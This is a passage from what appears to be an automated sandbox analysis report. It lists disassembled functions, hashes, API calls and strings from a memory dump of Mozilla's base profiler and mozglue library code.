Instruction ID: 74815975401d012b9c5b82fc612d258ea3ca7e91d580970858bfb7b2fe73cd1e
Opcode Fuzzy Hash: d077d2515b652df3e93b97476cfbe80de89b3795a0deb1f8ba932ea9462c6a7e
Instruction Fuzzy Hash: 8641C571F01219AFDF04CFA9D880ADEB7B9EF88354F14812AE505B7744DB30E9458B91

Function 6C995C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C964A63,?,?), ref: 6C995F06

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8745eea95e5bae02b8e819d74c166b2ec13f30b0eb12db011c6d3cc4fa62b507
Instruction ID: e87c19aeb54141b40e2ff11cc4c98e9d4ce69d8caccf48a06b77821da2475711
Opcode Fuzzy Hash: 8745eea95e5bae02b8e819d74c166b2ec13f30b0eb12db011c6d3cc4fa62b507
Instruction Fuzzy Hash: DAC1C175D012099BCB04CFA5C5906EEBBF6FF8A319F28425DD8556BB44D732A846CB80

Function 6C95DFE0 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4ccaa2f6742391cfa21121713cd7bef9f0100b3b6bfbb65e42e8252148ec2f
Instruction ID: a899fa613e4c4b232c11e9189b4b7732dc773f6f34e3f0bd3ad67280208987b7
Opcode Fuzzy Hash: ff4ccaa2f6742391cfa21121713cd7bef9f0100b3b6bfbb65e42e8252148ec2f
Instruction Fuzzy Hash: AC42D472A087518BD304CE3CC49035AF3E2BFC9364F594B2DE999A7794D739D9418B82

Function 6C9C76E3 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: b85fa92e39bd717ff08c812256885db20c52909c69fc35117cf796b061bc8064
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: 8332F871E0061A8FDB14CF98C8D0AADFBB6FF88304F6481A9C549A7745D731A986CF91

Function 6C9C6E63 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 339a7a8d9ce8ff281e064841f521848a5f2afeceb7f9eb647f16b7c89a008e69
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: F522E871E0061A8FDB14CF98C880AADF7F6FF88304F6485AAC549A7745D731A986CF91

Function 6C980512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 286ab1b55caabb77574da8dc762465e9dbb4a6a592fa37c3ece0a54f2dbccbfb
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: FC221671E01659CFCB24CF98C890AADF7B2FF89308F548699C54AA7705D731A986CF90

Function 6C9CAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438b163c0aa609187af82fd67fb495aa0d56262e55ffb230bb49f57c8f6d2f1c
Instruction ID: 845f37bb87fd0395f7ec045ee9b6bdfdba6238f99a989a2309416836ff3aa9ca
Opcode Fuzzy Hash: 438b163c0aa609187af82fd67fb495aa0d56262e55ffb230bb49f57c8f6d2f1c
Instruction Fuzzy Hash: C3F14871B087458FD700CE28C8913AAB7E6AFD5318F158A2DE8D487781EB74D9898793

Function 6C95C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 5f235e11923b688408c7ff9597425e03612c3ff3549a37dde2826480d5134435
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: AAA1AA71F0021A8FDB08CE69C8913AEB7F2AFC8354F588269D915E7781DB349D168B90

Function 6C997710 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: c4444cc0414dca8a1ee3cfbbd6a76bfc4cbfc28a3113b9b055c67c1c36ca1372
Instruction ID: 9235d4aeb16e95b897db654b44aad1d842f977bcab8bd4c1c42e8846b01dd419
Opcode Fuzzy Hash: c4444cc0414dca8a1ee3cfbbd6a76bfc4cbfc28a3113b9b055c67c1c36ca1372
Instruction Fuzzy Hash: 7B714C75E012198FCB18CF99D8905EDBBB6FF89314F28816ED415AB740DB31A945CB90

Function 6C9958E0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: 5f3271e0b6d1972c6f9a5bf7d2f7ee605f6e000976014a997e28f346435fa738
Instruction ID: e27303789d493c5076aeb74b262a07e258456b216b98fe066c17ff9ed332aa26
Opcode Fuzzy Hash: 5f3271e0b6d1972c6f9a5bf7d2f7ee605f6e000976014a997e28f346435fa738
Instruction Fuzzy Hash: F5817A75A012199FCB04CFA8C8809EEBBF6FF89314F684269D511AB741D731E945CBA0

Function 6C99CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C96582D), ref: 6C99CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C96582D), ref: 6C99CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9CFE98,?,?,?,?,?,6C96582D), ref: 6C99CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C96582D), ref: 6C99CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C96582D), ref: 6C99CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C96582D), ref: 6C99CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C96582D), ref: 6C99CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C99CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C99CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C99CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C99CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C99CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C99CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C99CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C99CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C99CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C99CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C99CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C99CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C99CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C99CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C99CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C99CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C99CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C99CE8A

Strings

fileioall, xrefs: 6C99CCA8
preferencereads, xrefs: 6C99CD92
java, xrefs: 6C99CC37
jsallocations, xrefs: 6C99CD0E
unregisteredthreads, xrefs: 6C99CE58
cpuallthreads, xrefs: 6C99CE16
noiostacks, xrefs: 6C99CCBE
mainthreadio, xrefs: 6C99CC7C
fileio, xrefs: 6C99CC92
seqstyle, xrefs: 6C99CCE6
samplingallthreads, xrefs: 6C99CE2C
ipcmessages, xrefs: 6C99CDBE
processcpu, xrefs: 6C99CE6E
nostacksampling, xrefs: 6C99CD7C
stackwalk, xrefs: 6C99CCF8
audiocallbacktracing, xrefs: 6C99CDD4
screenshots, xrefs: 6C99CCD4
nativeallocations, xrefs: 6C99CDA8
Unrecognized feature "%s"., xrefs: 6C99CEA0
notimerresolutionchange, xrefs: 6C99CE00
default, xrefs: 6C99CC21
leaf, xrefs: 6C99CC66
markersallthreads, xrefs: 6C99CE42
power, xrefs: 6C99CE84

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 049deccd7b179f3df5266eb65aac10e76e7929683c6140fb83ff99b66d0a272e
Instruction ID: 83ba0149e1da4508ae46db8caf5da7f62224e50d92e28a20b1727d8fa29fa8dd
Opcode Fuzzy Hash: 049deccd7b179f3df5266eb65aac10e76e7929683c6140fb83ff99b66d0a272e
Instruction Fuzzy Hash: 8751A7C1B4562622FF0431157D10BAA184DEFB724AF1C443AED1AA1F90FF05E71A86B7

Function 6C9647C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C964801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C964817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C96482D
__Init_thread_footer.LIBCMT ref: 6C96484A

Part of subcall function 6C98AB3F: EnterCriticalSection.KERNEL32(6C9DE370,?,?,6C953527,6C9DF6CC,?,?,?,?,?,?,?,?,6C953284), ref: 6C98AB49
Part of subcall function 6C98AB3F: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C953527,6C9DF6CC,?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98AB7C

GetCurrentThreadId.KERNEL32 ref: 6C96485F
GetCurrentThreadId.KERNEL32 ref: 6C96487E
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C96488B
free.MOZGLUE(?), ref: 6C96493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C964956
free.MOZGLUE(00000000), ref: 6C964960
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C96499A

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

free.MOZGLUE(?), ref: 6C9649C6
free.MOZGLUE(?), ref: 6C9649E9

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C964A42
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9647FC
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C964828
[I %d/%d] profiler_shutdown, xrefs: 6C964A06
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C964812

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 2fbc5fb9be08767893a91cb3a760ae8df8be2b8a6196d0d2bf022ff6f6b5cabf
Instruction ID: 08453eb5f0dbc9816052d0d2f3ad419fc9f7ccd014a6fa1920723bf4cc2f4576
Opcode Fuzzy Hash: 2fbc5fb9be08767893a91cb3a760ae8df8be2b8a6196d0d2bf022ff6f6b5cabf
Instruction Fuzzy Hash: D0812571A049009BEB00DFA9C86876A3775AF5232DF240229D916A7FC1D731F894CF96

Function 6C964470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C964730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9644B2,6C9DE21C,6C9DF7F8), ref: 6C96473E
Part of subcall function 6C964730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C96474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9644D2
InitOnceExecuteOnce.KERNEL32(6C9DF80C,6C95F240,?,?), ref: 6C96451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C96455C
LoadLibraryW.KERNEL32(?), ref: 6C964592
InitializeCriticalSection.KERNEL32(6C9DF770), ref: 6C9645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C9645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C9645BB
InitOnceExecuteOnce.KERNEL32(6C9DF818,6C95F240,?,?), ref: 6C964612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C964636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C964644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C96466D
VerSetConditionMask.NTDLL ref: 6C96469F
VerSetConditionMask.NTDLL ref: 6C9646AB
VerSetConditionMask.NTDLL ref: 6C9646B2
VerSetConditionMask.NTDLL ref: 6C9646B9
VerSetConditionMask.NTDLL ref: 6C9646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C9646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9646FD

Strings

NativeNtBlockSet_Write, xrefs: 6C9646F7
l, xrefs: 6C964578
user32.dll, xrefs: 6C964557, 6C96463F
WRusr.dll, xrefs: 6C9644B5
kernel32.dll, xrefs: 6C9644CD

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: f27f717a67b20e8f9a74b2af67ba918b4ef8d69f493e4142ebe7b93006c3dbff
Instruction ID: 95f3080130d8457ce0f29acd07269db9e794ac254ff7730002b5faff1b8e1813
Opcode Fuzzy Hash: f27f717a67b20e8f9a74b2af67ba918b4ef8d69f493e4142ebe7b93006c3dbff
Instruction Fuzzy Hash: 2261F7B16087449FFB00DFA1C80AB957BB8EB4270CF24C559E505ABA91D770E6C4CFA1

Function 6C99E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C997090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C99B9F1,?), ref: 6C997107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C99DCF5), ref: 6C99E92D
GetCurrentThreadId.KERNEL32 ref: 6C99EA4F
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EA5C
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EA80
GetCurrentThreadId.KERNEL32 ref: 6C99EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C99DCF5), ref: 6C99EA92
GetCurrentThreadId.KERNEL32 ref: 6C99EB11
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C99EB3C
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EB5B

Part of subcall function 6C995710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C99EB71), ref: 6C9957AB

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C99EBAC

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

GetCurrentThreadId.KERNEL32 ref: 6C99EBC1
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000), ref: 6C99EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C99EBE5
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8,00000000), ref: 6C99EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C99EC46
CloseHandle.KERNEL32(?), ref: 6C99EC55
free.MOZGLUE(00000000), ref: 6C99EC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C99EA9B
[I %d/%d] profiler_start, xrefs: 6C99EBB4

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 3145cb90d335be97890469e9718d1b74dd249c376b04779be51412aa5bf88626
Instruction ID: 2aa7de54209fbba727499cebadc23d7e2544764f98b9149ff84a5c138505d6e8
Opcode Fuzzy Hash: 3145cb90d335be97890469e9718d1b74dd249c376b04779be51412aa5bf88626
Instruction Fuzzy Hash: 39A15B31704A049FDB009F28C849B6A77B5FF9631DF298129E919A7F51DB30F884CBA1

Function 6C99F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99F70E
